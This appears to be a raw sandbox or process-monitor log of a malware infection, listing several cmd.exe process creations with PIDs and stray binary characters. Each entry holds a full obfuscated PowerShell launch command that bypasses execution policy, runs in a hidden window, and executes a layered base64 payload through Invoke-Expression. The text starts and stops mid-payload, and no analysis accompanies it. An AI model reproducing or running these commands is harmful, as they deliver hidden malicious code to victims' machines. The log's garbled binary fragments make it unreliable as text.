sAVgBUAEkAbgBLAHkAZAB3AGIAMgA1AFQAYgBXAFIATABUAEMAYwByAEoAMwBNADIASgB5AHMAbgBUADEASgB4AE4AVgBWAEgATgBpAGMAcgBKADAAMQBFAGQAVgBVAG4ASwB5AGMANABVAFMAYwByAEoAegBKADUAYwAyAEkAbgBLAHkAZABUAGUAVQBVAG4ASwB5AGQATQBiAEYAVgBCAEoAeQBzAG4AZQBDAGMAcgBKADIATgBaAEoAeQBzAG4AYwBuAEIAUgBKAHkAcwBuAGQAWABVAHcAVABTAGMAcgBKAHoATgBzAEoAeQBzAG4AUQBpAGMAcgBKADIAOAB5AFMAbQB3AHgAVgBDAGMAcgBKADEARgAyAGMAMAA4AG4ASwB5AGQAVwBKAHkAcwBuAFoAVABFADEASgB5AHMAbgBSAHkAYwByAEoAMgBoADIASgB5AHMAbgBOAGkAYwByAEoAMQBKAHcAZQBYAFUAbgBLAHkAZABCAFYAbABwAHoAZAAwAGMAbgBLAHkAZAB3AFQAbQAwAG4ASwB5AGQAVQBKAHkAcwBuAFoAegBaAEoAWgBVADAAbgBLAHkAZABJAE4ARgBkAHYAUQB5AHQAWgBOAFgAWgBYAFoAMABnADIASgB5AHMAbgBlAEgAUQBuAEsAeQBkAHAAWQBtAEYAbQBVAGkAYwByAEoAMgBsADAASgB5AHMAbgBiAGsAaABqAFoAUwBjAHIASgAwAEYASABkAGoAZwBuAEsAeQBkAE8AUQB5AGMAcgBKADAARQBuAEsAeQBkAEoAZABFAE4AaQBPAEUAVgBRAGMARwBkAE4AVgBuAG8AbgBLAHkAZAB6AE0AUwBjAHIASgB6AGsAMQBNAHkAYwByAEoAMABGAHYASgB5AHMAbgBWAGkAdABQAFMARQA1AGsAYgAzAFEAdgBjADAAZAA1AEoAeQBzAG4AUQBsAGwAVQBTAGsATgBFAEoAeQBzAG4AVwBuAGQAaQBOAFgAWQBuAEsAeQBjADIASgB5AHMAbgBOAFMAYwByAEoAMABnAHkAUgBFAFUAbgBLAHkAZABzAEoAeQBzAG4AZQBTAGMAcgBKADMAbwByAFkAVwAxAFoASQBDAGsAZwBKAHkAcwBuAEwAQwBjAHIASgAxAHMAbgBLAHkAZABwAEoAeQBzAG4AVAB5ADUARABUAHkAYwByAEoAMgAxAHcASgB5AHMAbgBjAGkAYwByAEoAMABWAFQAVQAyAGwAdgBiAGkAYwByAEoAeQA1AGoAYgAwADEAdwBVAG0AVgBUAGMAMgBsAHYAVABpAGMAcgBKADIAMABuAEsAeQBkAFAAUgBFAFUAbgBLAHkAZABkAE8AaQBjAHIASgB6AHAAawBSAFcATQBuAEsAeQBkAFAAVABYAEEAbgBLAHkAZABTAEoAeQBzAG4AUgBYAE0AbgBLAHkAZABUAEsAUwBjAHIASgB6AFUAbgBLAHkAZABTAEoAeQBzAG4AVAB5AEEAbABKAHkAcwBuAGUAeQBjAHIASgB5AEIAdQBKAHkAcwBuAFIAWABjAHQAVAAyAEoASwBaAFUATgAwAEkARwBsAHYATABuAE4AVQBjAGkAYwByAEoAMABWAGgAYgBYAEoARgBZAFMAYwByAEoAMABSAEYAYwBpAGcAZwBKAHkAcwBuAE8AQwBjAHIASgAzAGgAeQBYAHkAYwByAEoAeQBBAG4ASwB5AGMAcwBKAHkAcwBuAFcAMQBRAG4ASwB5AGQAbABKAHkAcwBuAFcAQwBjAHIASgAzAFEAdQBKAHkAcwBuAFIAVwA1AEQASgB5AHMAbgBiADIAUgBwAFQAaQBjAHIASgAyAGQAZABPAGoAcABCAEoAeQBzAG4AVQB5AGMAcgBKADAATgBKAGEAUwBBAG4ASwB5AGMAcABJAEgAMABuAEsAeQBjAGcASgB5AHMAbgBLAFMANABuAEsAeQBkAFMAWgBTAGMAcgBKADIARgBrAFYARQA5AEYAVABrAFEAbwBLAFMAQQBuAEsAUwA1AHkAUgBWAEIAcwBZAFUATgBsAEsAQwBoAGIAWQAyAGgAaABjAGwAMAA1AE4AeQB0AGIAWQAyAGgAaABjAGwAMAB4AE0ARABrAHIAVwAyAE4AbwBZAFgASgBkAE8ARABrAHAATABGAHQAegBkAEgASgBwAGIAbQBkAGQAVwAyAE4AbwBZAFgASgBkAE0AegBrAHAATABuAEoARgBVAEcAeABoAFEAMgBVAG8ASwBGAHQAagBhAEcARgB5AFgAVABVADIASwAxAHQAagBhAEcARgB5AFgAVABFAHkATQBDAHQAYgBZADIAaABoAGMAbAAwAHgATQBUAFEAcABMAEYAdAB6AGQASABKAHAAYgBtAGQAZABXADIATgBvAFkAWABKAGQATQB6AFkAcABMAG4ASgBGAFUARwB4AGgAUQAyAFUAbwBLAEYAdABqAGEARwBGAHkAWABUAFUAegBLADEAdABqAGEARwBGAHkAWABUAGcAeQBLADEAdABqAGEARwBGAHkAWABUAGMANQBLAFMAdwBuAGYAQwBjAHAAZgBDAEEAbQBJAEMAZwBnAEoARwBWAE8AZABqAHAAagBiADIAMQB6AFUARwBWAEQAVwB6AFEAcwBNAGoAWQBzAE0AagBWAGQATABVAHAAdgBTAFcANABuAEoAeQBrAD0AIgANAAoAJABsACAAPQAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAHQAZgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAawApACkADQAKAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAbAA=
༶䏈�ď༦䏈ď◐瓌\
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
109
4476
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JABtAD0AIgBLAEMAZwBuAEkAQwBnAGcAYgBtAFYAMwBMAFcAOQBpAFMAbQBWAEQAZABDAEEAZwBjADEAbAB6AFYARQBWAE4ATABtAGwAdgBMAGkAYwByAEoAMABOAFAAYgBYAEIAeQBSAFYATgBUAEoAeQBzAG4AYQBXADkAdQBMAGsAUgBsAEoAeQBzAG4AWgBtAHgAQgBWAEMAYwByAEoAMABVAG4ASwB5AGQAVABWAEMAYwByAEoAMQBJAG4ASwB5AGQAbABRAFUAMABuAEsAeQBjAG8AVwAzAE4ANQBVADEAUgBGAGIAUwA1AEoAVAB5ADUATgBKAHkAcwBuAFoAVwAxAFAAYwBuAGsAbgBLAHkAZAB6AGQASABKAGwAWQBVADEAZABJAEYAdABUAGUAVgBOADAAWgBVADAAdQBRADIAOQBPAFYAbQBWAHkAZABGADAANgBPAG0AWgB5AGIAMgAxAEMAUQBWAE4ARgBKAHkAcwBuAE4AagBSAFQAZABGAEoAcABUAGsAYwBvAEoAeQBzAG4ASQBIAEUAbgBLAHkAZABqAE4AawB4AFoATQAwADUARABKAHkAcwBuAGMAMABsADMAUgBVAGsAbgBLAHkAZABTAEoAeQBzAG4AWgBsAHAAagBiAGsASgBpAFYAVQBaAE8AYwBYAFoAVgBKAHkAcwBuAFcAQwBjAHIASgAyAFYAMgBKAHkAcwBuAFMASABVAG4ASwB5AGQAUgBKAHkAcwBuAE4ARgBNAHkATQBGAGwASwBKAHkAcwBuAGQARwA5AEMAUgBYAFIATQBkAG4AWQBuAEsAeQBkADEATgAzAEIAYQBaAFMAYwByAEoAegBVAG4ASwB5AGQAbwBjAHkAYwByAEoAMABkAGEASgB5AHMAbgBiAFcARgBXAFIAMgBSAHYAZQBDAGMAcgBKADAAWgBWAGUARABkAEsAYwAyAFIAdABSAFgAYwBuAEsAeQBkAEQAYgBrAFoAMABaAGoAUgBWAFoAeQBjAHIASgAyAHgANABSAEUAbwB3AGQAMgBJAG4ASwB5AGQAVwBKAHkAcwBuAGQAawAxAEoAVgBVADUAaQBTADMAZAAzAEoAeQBzAG4AVgBtAHAAMQBiAGsARQBuAEsAeQBkAGsAUwBqAFkAbgBLAHkAZABNAFMAagBaAGEASgB5AHMAbgBVADIAcABFAEoAeQBzAG4AWgAxAHAAUABhAFQAVgBFAFoARQA1AEYAZABHADUATABVAFQAZwBuAEsAeQBkADMAUwB5AGMAcgBKADIAaABpAGEAbgBoAGEAUgBXAEoAbABPAFUAWgBKAEoAeQBzAG4AVgBEAEUANQBSAFQAYwB2AGMARQB4AGkASgB5AHMAbgBOAG0AVQBuAEsAeQBkAFoASgB5AHMAbgBNADIAMQB4AGQAMgBoAFcASgB5AHMAbgBjADAAaABDAFUAaQBjAHIASgB6AFkAeQBaAGkAYwByAEoAegBJAG4ASwB5AGMAdwBPAFYAVgB1AEoAeQBzAG4AUwBrADQAegBKAHkAcwBuAE0AagBOAEMAUgBsAGgAdwBhAFgAWgAwAEoAeQBzAG4AVABsAE0AegBNAEMAYwByAEoAMABSAFcAYQBDAGMAcgBKADIAaABJAGEAaQA5AHIAWgBpAGMAcgBKADMARgBqAE4AaQBBAG4ASwB5AGMAcABJAEMAdwBuAEsAeQBjAGcASgB5AHMAbgBXADAAbABQAEwAawBOAFAAYgBYAEEAbgBLAHkAZABTAFIAWABNAG4ASwB5AGQAVABhAFUAOQBPAEwAaQBjAHIASgAwAE4AdgBUAFgAQgBTAFoAWABOAHoAUwBXADkATwBUAFMAYwByAEoAMgA5AEUAWgBTAGMAcgBKADEAMAA2AE8AawBRAG4ASwB5AGQARgBRAHkAYwByAEoAMgA4AG4ASwB5AGQATgBVAEYASQBuAEsAeQBkAEYAYwAzAE0AZwBKAHkAcwBuAEsAUwBjAHIASgB5AEIAcwBkAFYAbwBnAEoAeQBzAG4AUgBtADkAeQBKAHkAcwBuAFIAVQBGAGoAUwBDADEAdgBKAHkAcwBuAFkAbQBwAEYAUQAxAFEAZwBlAHkAYwByAEoAMgA1AGwAZAB5ADEAdgBKAHkAcwBuAFkAawBvAG4ASwB5AGQAbABKAHkAcwBuAFEAMwBRAGcASQBDAGMAcgBKADIAbAB2AEwAbgBOAFUASgB5AHMAbgBVAG0AVgBoAGIAVgBKAEYASgB5AHMAbgBZAFUAUgBGAFUAaQBnAGcAVgB6AGsAbgBLAHkAZABtAEoAeQBzAG4AWAB5AEEAbgBLAHkAYwBzAEkARgB0AFUASgB5AHMAbgBaAFMAYwByAEoAMQBoAFUATABtAFYATwBZAHkAYwByAEoAMgA5AEUAUwBXADUASABYAFMAYwByAEoAegBvADYASgB5AHMAbgBZAFgATgBEAGEAUwBjAHIASgAyAGsAcABJAEgAMABwAEwAbgBKAGwAUQBXAFIAMABiADAAVQBuAEsAeQBkAE8AUgBDAGcAZwBKAHkAcwBuAEsAUwBCAHMAZABWAG8AbgBLAHkAYwBnAEoAaQBnAGcAVgB6AGwAbQBSAFMAYwByAEoAMgA1ADIATwBpAGMAcgBKADIATgBQAGIAWABOAFEAWgBXAE4AYgBKAHkAcwBuAE4AQwB3AHgATgBTAGMAcgBKAHkAdwB5AE4AVgAwAG4ASwB5AGMAdABhAGsAOQBKAGIAbgBGAGoATgBuAEYAagBOAGkAawBuAEsAUwBBAGcATABWAEoARgBjAEUAeABCAFkAMABVAGcASQBDAGgAYgBZADIAaABCAFUAbAAwAHgATQBEAGcAcgBXADIATgBvAFEAVgBKAGQATQBUAEUAMwBLADEAdABqAGEARQBGAFMAWABUAGsAdwBLAFMAeABiAFkAMgBoAEIAVQBsADAAeABNAGoAUQB0AFUAawBWAHcAVABFAEYAagBSAFMAaABiAFkAMgBoAEIAVQBsADAAeABNAFQATQByAFcAMgBOAG8AUQBWAEoAZABPAFQAawByAFcAMgBOAG8AUQBWAEoAZABOAFQAUQBwAEwARgB0AGoAYQBFAEYAUwBYAFQATQA1AEkAQwAxAGoAVQBtAFYAdwBiAEUARgBEAFIAUwBBAGcASwBGAHQAagBhAEUARgBTAFgAVABnADMASwAxAHQAagBhAEUARgBTAFgAVABVADMASwAxAHQAagBhAEUARgBTAFgAVABFAHcATQBpAGsAcwBXADIATgBvAFEAVgBKAGQATQB6AFkAcABJAEgAdwBnAEoAaQBBAG8ASQBDAFIAVABTAEcAVgBNAGIARwBsAGsAVwB6AEYAZABLAHkAUgBUAFMARwBWAHMAVABHAGwARQBXAHoARQB6AFgAUwBzAG4AZQBDAGMAcAAiAA0ACgAkAG4AIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAdABmADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABtACkAKQANAAoASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABuAA==
�ď༢䏈ď◐瓌ᇂ㘔\
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Process
110
4804
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JABvAD0AIgBKAGkAZwBnAEoARwBWAHUAZABqAHAARABiADAAMQB6AGMARwBWAEQAVwB6AFEAcwBNAGoAUQBzAE0AagBWAGQATABVAHAAUABTAFcANABuAEoAeQBrAGcASwBDAEEAbwBLAEMAYwBvAEkAQwBjAHIASgAyADUARgBkAHkAMQB2AFEAawBvAG4ASwB5AGQARgBRADMAUQBnAEkARgBOAFoASgB5AHMAbgBVAHkAYwByAEoAMwBRAG4ASwB5AGQARgBUAFMANABuAEsAeQBkAEoAYgB5ADQAbgBLAHkAZABUAFYARgBKAEYASgB5AHMAbgBZAFUAMQB5AFoAVQBGAEUAWgBYAEkAbwBKAHkAcwBuAEkAQwBoAHUAUgBTAGMAcgBKADMAYwB0AEoAeQBzAG4AYgAwAEoASwBKAHkAcwBuAFIAVQBOADAASgB5AHMAbgBJAEMAQgB6AFcAWABNAG4ASwB5AGQAMABaAFcAMAB1AEoAeQBzAG4AYQBTAGMAcgBKADAAOAB1AFEAMAA5AE4AVQBDAGMAcgBKADEASgBGAEoAeQBzAG4AVQAzAE4AcABiAHkAYwByAEoAMgA0AHUAWgBFAFYARwBiAEcARgAwAFIAUwBjAHIASgAzAE0AbgBLAHkAZAAwAFUAbQBWAGgAYgBTAGcAZwBXADAAbAB2AEwAbQAxAGwAYgBTAGMAcgBKADIAOQBTAGUAVgBOADAAYwBpAGMAcgBKADIAVgBoAEoAeQBzAG4AYgBWADAAbgBLAHkAZABiAFkAMAA4AG4ASwB5AGQAdQBWAG0AVgB5AFYARgAwAG4ASwB5AGMANgBPAGsAWgB5AFQAMgAxAGkAWQBTAGMAcgBKADEATgBGAE4AagBSAFQAVgBDAGMAcgBKADEASgBKAGIAbQBjAG4ASwB5AGMAbwBJAEgAcwB4AGYAVQB4AFYATQAzAFIARQBjADAAawBuAEsAeQBkAG4AUgBFAGgANQBKAHkAcwBuAFYAaQBjAHIASgAyAGgAcQBMAHkAYwByAEoAMgBRAG4ASwB5AGQAcgBKAHkAcwBuAGEAbQA1AGoAYQBEAFUAdgBKAHkAcwBuAFMAaQBjAHIASgAwAGgAbgBXAFUAZwBuAEsAeQBjADIAUQBrAGwASQBRADEAUQBuAEsAeQBkAG4ATQBVAFYAMABOADIAUQBuAEsAeQBkAGsAYwBIAEoAUgBKAHkAcwBuAGQAUwBzAG4ASwB5AGQAMQBNAFYAQQBuAEsAeQBkAGwAYwBDAGMAcgBKADAATgB3AFEAMgBGAHUASgB5AHMAbgBZAGwAVQAxAGQAQwBjAHIASgAwAFkAbgBLAHkAZABvAGQAVQB3ADEAYgB6AEEAbgBLAHkAZABXAFYAMgBnAHYAYwB5AGMAcgBKADIAUgBFAEoAeQBzAG4AWgBYAGcAbgBLAHkAZABLAGIAVABJAG4ASwB5AGQAMwBhAEUARgBNAGIAQwBjAHIASgAzAGwARABVAGwATgBzAE0AVgBCAFUASgB5AHMAbgBWAFgAVQB5AGIAegBaAEoAZQBpAGMAcgBKADIAVgBwAFcAQwBjAHIASgAwAE4AbQBSAFgAaABzAFMARgBWAHQAZABFADkAUABjAEUAUgB4AE0AVwB3AG4ASwB5AGQARABZAFMAYwByAEoAegBrAG4ASwB5AGQATwBWAEQAQgBYAFkAMABSAEgAUQBXAHgAdgBTAHkAYwByAEoAMgA1AEMAZQBYAE4AegBVAGkAYwByAEoAMQBkAFAAYwAzAGQAYQBTAG0AWgBCAFcAVABVAG4ASwB5AGQATABMAHoAVQBuAEsAeQBkAFkASwB6AEUAdgBiAGoATQBuAEsAeQBkAGoAUQAyAEkAbgBLAHkAZABKAFEAbQB3AG4ASwB5AGQAbQBhADEATQBuAEsAeQBkAEUASgB5AHMAbgBkAHkAOQB6AEoAeQBzAG4AVABVAGgAawBVADEAZABQAFYAUwBjAHIASgAyAFYAdABXAGoAZAA2AGIAawBsAG8ATgBDAGMAcgBKADAAZAAwAE4AaQBjAHIASgAxAGQAUABSAHkAYwByAEoAMwBoAFcATQB6AGcAMABjAGkAYwByAEoAMQBRAG4ASwB5AGQAUwBXAGsAUQBuAEsAeQBkADYATAAwAHAAegBKAHkAcwBuAFUAMgBKADMASgB5AHMAbgBkAGkAYwByAEoAMABrAG4ASwB5AGQATQBlAHoARgA5AEoAeQBzAG4ASQBDAGsAZwBMAEMAYwByAEoAMQB0AFQAVwBYAE4AVQBaAFUAMAB1AFMAUwBjAHIASgAyADgAdQBZADIAOABuAEsAeQBkAE4AYwBIAEoAbABVADEATgBwAGIAeQBjAHIASgAyADQAdQBKAHkAcwBuAFkAeQBjAHIASgAwADgAbgBLAHkAZABOAEoAeQBzAG4AYwBIAEkAbgBLAHkAZABGAEoAeQBzAG4AVQAxAE4ASgBKAHkAcwBuAFQAeQBjAHIASgAyADUATgBiADIAUgBsAFgAVABvADYAWgBHAFYAagBiADAAMQB3AFUAawBWAHoAYwB5AGMAcgBKAHkAawBnAEoAeQBzAG4ASwBTAEEAbgBLAHkAYwBzAFcAeQBjAHIASgAxAFIAbABlAEgAUQBuAEsAeQBjAHUAWgBVADUAagBiADAAUgBwAGIAawBkAGQASgB5AHMAbgBPAGoAcABCAFUAMgBNAG4ASwB5AGQASgBTAFMAawBwAEwAaQBjAHIASgAzAEoARgBZAFMAYwByAEoAMgBSADAASgB5AHMAbgBiADIAVgBPAFIAQwBjAHIASgB5AGcAZwBLAFgAcwBuAEsAeQBjAHcAZgBTADQAbwBLAEYAWgBoAGMAaQBjAHIASgAwAGsAbgBLAHkAZABCAFkAaQBjAHIASgAwAHgAbABJAEMAYwByAEoAMwBzAHgAZgBTAG8AbgBLAHkAZAB0AFIARgBJAHEAZQB5AGMAcgBKAHoARgA5AEsAUwA1AE8AUQBXADEARgBXAHoATQBzAE0AVABFAHMATQBsADAAdABKAHkAcwBuAGEAaQBjAHIASgAyADgAbgBLAHkAZABwAFQAbgBzAHgAZgBYAHMAeABmAFMAawBuAEsAUwAxAEcASQBGAHQAagBhAEUARgB5AFgAVABFAHkATgBDAHgAYgBZADIAaABCAGMAbAAwAHoATwBTAGsAcAAiAA0ACgAkAHAAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAdABmADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvACkAKQANAAoASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABwAA==
ཞ䏈ď◐瓌ᇂ㘔
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
111
4488
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JABxAD0AIgBLAEMAZwBuAEkAQwBoAHUAWgBWAGMAdABiADIASgBxAFIAUwBjAHIASgAwAE0AbgBLAHkAZAAwAEkARwBsAHYATABrAE4AUABUAFgAQgBTAFoAWABNAG4ASwB5AGQAVABTAFcAOQB1AEwAaQBjAHIASgAwAFIARgBKAHkAcwBuAFIAbQB3AG4ASwB5AGQAaABWAEcAVgB6AGQASABJAG4ASwB5AGQARgBZAFUAMABuAEsAeQBjAG8ASgB5AHMAbgBXADAAbAB2AEoAeQBzAG4ATABrADEAbABUAFcAOQBTAFcAWABOADAASgB5AHMAbgBjAG0AVgBoAGIAVgAxAGIAYwAzAGwAVABkAEcAVQBuAEsAeQBkAHQATABtAE4AUABKAHkAcwBuAFQAbABZAG4ASwB5AGQAbABVAG4AUgBkAE8AagBwAG0ASgB5AHMAbgBjAG0AOQBOAFEAaQBjAHIASgAyAEUAbgBLAHkAZAB6AFoAVABZADAAVQB5AGMAcgBKADEAUgBTAGEAVwA1AG4ASwBHAFIAbABlAEUAaABaAE4AMgBJAG4ASwB5AGQARQBKAHkAcwBuAGIAeQBjAHIASgAwAGsAbgBLAHkAZAAzAFIARQBsAGEAWgBuAEEAbgBLAHkAZABrAGIAVQBaAG8AVgBWAEUAbgBLAHkAZABrAFMAMABJAG4ASwB5AGMAMABWAEcASgB5AGUAaQBjAHIASgB6AE4ASgBVAGkAYwByAEoAMgBKAHYAWQAwAEYAdABkADEAbwBuAEsAeQBkAEUAVABrAHMAbgBLAHkAZABZAFUARwBJAG4ASwB5AGQAMQBkAEcAeAA2AEoAeQBzAG4ATQBDADgAbgBLAHkAZABRAEoAeQBzAG4ATQBYAFIATwBOAEMAYwByAEoAMQBaAEwAYQBEAFYANQBUADAAOQBXAFYAUwBjAHIASgB6AFUAeABWAG0ANQAwAFQAQwBjAHIASgAwAFYAaQBKAHkAcwBuAFkAegBRAG4ASwB5AGQAdwBOAEYAYwAwAGIAVQBRAG4ASwB5AGQAYQBaAGsAeABDAGQAVQBwAEQASgB5AHMAbgBlAFcAaABSAFQAagBGAEsAVgBVAGwASwBaAFcAaABGAE4AVQA0AG4ASwB5AGQARwBKAHkAcwBuAGQAawBZAHgATQBXAFEANQBKAHkAcwBuAGUAVQA5AHUAVAAxAFIAYQBlAFMAYwByAEoAMgBSAGEAUQBTAGMAcgBKAHoAbABvAFQAbABBAG4ASwB5AGQAWABKAHkAcwBuAGEARwBVAG4ASwB5AGQARgBKAHkAcwBuAFIAVABBAG4ASwB5AGMAdgBkAFYASgByAFEAMQBKAG0AWgBWAFEANABiAFYAWQAyAEwAegBWAFYAYQBrAEUAMgBNAFMAYwByAEoAMwBwAEIAYgBtAEoAUQBhAEMAYwByAEoAegBWADUASgB5AHMAbgBZAFQASQByAFIAVQA4AG4ASwB5AGQAbABhAGsAawBuAEsAeQBkAE0AYgB6AGsAbgBLAHkAZABTAGUAWABBAG4ASwB5AGMAMABUADEAQgByAFIAeQBjAHIASgB6AGgAbQBKAHkAcwBuAGEAawB4ADYAYQBpAGMAcgBKADMAZAAzAGMASABjAHkAYgBGAEUAeABiAEcANABuAEsAeQBjADQAUABXAFIAbABlAEMAYwByAEoAeQBBAHAASQBDAHcAbgBLAHkAZABiAEoAeQBzAG4AYQBXADgAdQBRAHkAYwByAEoAMgA5AE4AYwBIAEoARgBjAHkAYwByAEoAMQBOAHAAVAB5AGMAcgBKADAANABuAEsAeQBjAHUAUQB5AGMAcgBKADAAOABuAEsAeQBkAE4AVQBGAEkAbgBLAHkAZABGAFUAeQBjAHIASgAzAE4ASgBUADIANQB0AGIAMABSAEYAWABTAGMAcgBKAHoAbwBuAEsAeQBjADYAUgBHAFYAagBKAHkAcwBuAFQAMgAxAHcAVQBrAFYAegBVAHkAQQBwAEkAQwBjAHIASgAzAFkAbgBLAHkAZABQAGUAbQBaAFAAVQBpAGMAcgBKADAAVgBCAFkAMABoADcAYgBtAFYAWABMAFcAOQBpAEoAeQBzAG4AYQBrAFYARABkAEMAQgBUAEoAeQBzAG4AZQBWAE0AbgBLAHkAZABVAFoAVQAwAHUASgB5AHMAbgBhAFMAYwByAEoAMgA4AHUAYwAxAFEAbgBLAHkAZAB5AFIAVQBGAHQAYwBrAFUAbgBLAHkAZABCAEoAeQBzAG4AUgBFAFYAUwBLAEMAQgB1AFQAVABsAFcAWAB5AHgAYgBKAHkAcwBuAFYARQBWAFkAVgBDADUAbABKAHkAcwBuAFQAawBOAHYAWgBDAGMAcgBKADAAbAB1AFIAeQBjAHIASgAxADAANgBPAGsARgBUAFEAMgBsAHAASgB5AHMAbgBJAEMAawBnAGYAUwBBAHAATABpAGMAcgBKADMASgBsAFEAUwBjAHIASgAyAFIAVQBiADAAVgB1AFoAQwBnAG4ASwB5AGMAcABKAHkAcwBuAEkASABaAFAAZQBpAGMAcgBKAHkAWQBvAEsASABaAGgAYwBtAGsAbgBLAHkAZABoAFkAaQBjAHIASgAwAHgAbABKAHkAcwBuAEkARwBSAGwAZQBDAGMAcgBKAHkAcAB0AFoARgBJAG4ASwB5AGMAcQBaAEcAVgA0AEoAeQBzAG4ASwBTADUATwBZAFcAMQBsAEoAeQBzAG4AVwB6AE0AbgBLAHkAYwBzAEoAeQBzAG4ATQBTAGMAcgBKAHoARQBzAE0AaQBjAHIASgAxADAAbgBLAHkAYwB0AGEAbQA5AEoAVABtAFIAbABlAEcAUgBsAGUAQwBrAG4ASwBTAEEAZwBMAFgASgBsAGMARQB4AEIAUQAwAFUAZwBKADIANQBOAE8AVgBZAG4ATABGAHQARABhAEUARgBTAFgAVABNADIATABVAE4AeQBaAFYAQgBzAFkAVwBOAEYASQBDAGgAYgBRADIAaABCAFUAbAAwAHgATQBEAEEAcgBXADAATgBvAFEAVgBKAGQATQBUAEEAeABLADEAdABEAGEARQBGAFMAWABUAEUAeQBNAEMAawBzAFcAMABOAG8AUQBWAEoAZABNAHoAawBnAEwAVQBOAHkAWgBWAEIAcwBZAFcATgBGAEkAQwBkADIAVAAzAG8AbgBMAEYAdABEAGEARQBGAFMAWABUAEUAeQBOAEMAawBnAGYARwBsAHUAVgBrADkAcgBaAFMAMQBGAFcARgBCAFMAUgBYAE4AegBTAFcAOQBPACIADQAKACQAcgAgAD0AIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQB0AGYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHEAKQApAA0ACgBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAHIA
ď◐瓌ᇂ㘔
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
112
1088
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JABzAD0AIgBMAGkAQQBvAEkAQwBSAEYAYgBsAFkANgBRADIAOQBOAGMAMQBCAGwAUQAxAHMAMABMAEQASQAyAEwARABJADEAWABTADEAcQBUADAAbAB1AEoAeQBjAHAASwBDAGcAbgBLAEMAQgB1AFIAWABjAG4ASwB5AGMAdABUADIASgBxAFoAVwBOADAASQBDAGMAcgBKADIAawBuAEsAeQBkAHYATABrAE0AbgBLAHkAZABQAGIAVgBCAFMAWgBYAE4AVABhAFUAOQBPAEoAeQBzAG4ATABtAFEAbgBLAHkAZABsAFoAbQB4AEIAVgBFAFUAbgBLAHkAZABUAFYAQwBjAHIASgAxAEoAbABRAFMAYwByAEoAMAAwAG4ASwB5AGMAbwBXAHkAYwByAEoAMABsAHYATABpAGMAcgBKADAAMABuAEsAeQBkAEYAVABVADkAUwBlAFgATgBVAFUAawBWAGgAYgBWADEAYgBVADMAbAB6AFYARwBWAHQATABtAE4AUABiAGwAWgBsAFUAbABSAGQASgB5AHMAbgBPAGoAcABtAFUAaQBjAHIASgAyADkATgBRAGsARgB6AFoAUwBjAHIASgB6AFkAMABVAHkAYwByAEoAMQBSAFMAYQBXADUAbgBLAEcAaABqAGIAVQBoAFYASgB5AHMAbgBNADIASQBuAEsAeQBkAEQAYwAwAGwAMwBSAEYAQQB5AEoAeQBzAG4AVgBqAEIAbgBKAHkAcwBuAFoAVABkAG4AVgBuAEoAeQBXAEYAZABGAEoAeQBzAG4AWgBsAFUAMwBaAEgAVQBuAEsAeQBkAEUAYwBsAGwAWABWAG4ARgBtAFIAQwBjAHIASgAyAHQASQBMAHoATgBTAEoAeQBzAG4AUgAyAGgAUABNAEgAQgA0AFQARgBaAHYAVgB5AGMAcgBKADIAMQBRAFoARQA4AG4ASwB5AGQAUABlAFcASgBJAFoAUwBjAHIASgAzAFIATgBjAGoAQgBSAE8ARwBwAGkAVwBTAGMAcgBKADAANQBhAEoAeQBzAG4AYgBTAGMAcgBKADAAVgBYAGEAbABRAHgAUwBuAEIAVABSAG0ATgBpAFYAegBCAHEASgB5AHMAbgBVAHoAVgBGAE4AUwBjAHIASgAxAEoAUgBXAEQAVgBzAGQAVQB4AEYASgB5AHMAbgBOAHkAYwByAEoAMgA1AHQAUQB6AFUAbgBLAHkAZABOAGMAMgBvADIASgB5AHMAbgBhAFUAUgByAGUARABSAEUASgB5AHMAbgBaADEASQByAEoAeQBzAG4AVwBqAEIAcwBKAHkAcwBuAFIAbgBSAHMAWQBWAE0AbgBLAHkAZABRAFQAVwBOAHQAVABrADEAbwBUAFMAYwByAEoAMwBGAE0AUgB5AGMAcgBKADEAQgBEAGMAUwBjAHIASgB6AE0AdgBKAHkAcwBuAGUAUwBjAHIASgAzAEIASABTAFcAVgB4AFcARQBwAGsATQBFAFoAYQBTAEUAdAA1AE4AbgBVAG4ASwB5AGMAegBKAHkAcwBuAFEAVgBCAHIAVwBDAGMAcgBKAHoAUgA1AE0ARQA1AGkAYwB